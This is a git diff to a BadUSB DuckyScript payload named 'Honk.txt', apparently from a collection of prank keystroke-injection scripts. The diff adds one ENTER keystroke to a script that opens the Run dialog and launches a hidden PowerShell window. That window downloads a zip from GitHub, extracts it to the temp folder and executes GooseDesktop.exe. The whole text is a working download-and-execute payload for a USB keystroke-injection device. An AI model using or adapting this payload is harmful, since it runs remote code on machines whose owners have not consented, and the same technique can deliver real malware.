diff --git a/BadUSB/Honk.txt b/BadUSB/Honk.txt index cfc723f6..1dba9a35 100644 --- a/BadUSB/Honk.txt +++ b/BadUSB/Honk.txt @@ -11,6 +11,7 @@ DELAY 300 GUI r DELAY 500 STRING powershell +ENTER DELAY 2000 STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit ENTER